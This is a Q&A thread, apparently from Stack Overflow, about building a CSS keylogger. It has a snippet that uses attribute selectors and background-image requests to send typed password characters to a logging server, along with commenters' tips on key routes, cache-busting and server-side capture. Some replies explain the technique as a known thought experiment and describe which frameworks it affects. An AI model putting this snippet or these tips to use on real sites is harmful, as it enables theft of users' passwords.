# How do you make a Keylogger with CSS?

Tags: html, css, keylogger

```html
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
  inp.setAttribute('value', inp.value)
});
```

Is what I've found but I don't think it works. How do I do it?

Comment: Does this answer your question? [Is it possible to use an input value attribute as a CSS selector?](https://stackoverflow.com/questions/10645552/is-it-possible-to-use-an-input-value-attribute-as-a-css-selector)

Comment: If you use a text input just request the "key-image" using `Event.code` or `Event.key`. If you're emulating a virtual keyboard, on `:active` use CSS to call an image from the server. On the server side you can keep track of the order of the images requested by the browser. ;) Just make sure to cache invalidate the images using a query param like `/klog/a?t=randomNumber`. Your last three lines of JS make not much sense... resetting an input value can just lead to huge problems. Also did you know one can copy/paste values into a field?

Comment: Also, you could just use a single route like: `/klog?<key>`

Answer (score 0):

**Edit:** I realised that the CSS snippet won't work as typing in the input field will not change the value attribute of the html element. A JavaScript function is required to do this. Hence, include the last 3 lines of your snippet in a script tag and then it should work.

The CSS Keylogger was originally a thought experiment as explained in this [LiveOverflow video](https://youtu.be/oJ6t7AImTdE). The snippet you are using is assuming that `http://localhost:3000/` is a malicious Web server which records your HTTP requests.

In this case entering "a" on the keyboard (in the input field) would send a request to `http://localhost:3000/a` (for fetching the background image) which you may intercept as "a" on the Web server. You may write a NodeJS or Python Web server to intercept these requests and get the keystrokes.

Comment: (Generally speaking), the CSS attribute selector won't match the "live" DOM value of an element's attribute, even when explicitly set with `setAttribute`, so `input[value="a"]` will only match `<input value="a"/>` _if that's what appears in the literal HTML source_ when the page is loaded, but _not_ if the input was originally blank and the user types an "a" into the box.

Comment: Here's a JSFiddle that demonstrates that CSS attribute selectors won't select elements based on the live-DOM-value-of-`value=""`: https://jsfiddle.net/z2y5spLc/

Comment: Thanks for informing, Now I understood why the snippet included the javascript code for changing the value attribute of the input element.

Comment: I need to partially retract my initial statement: using `setAttribute` **will** work: https://jsfiddle.net/693fkbre/

Comment: An important point here is explained at about 6:40 in the video you linked. Many JS frameworks, and most notably React, have that particular snippet built in to them, so web sites and apps built on those frameworks are vulnerable.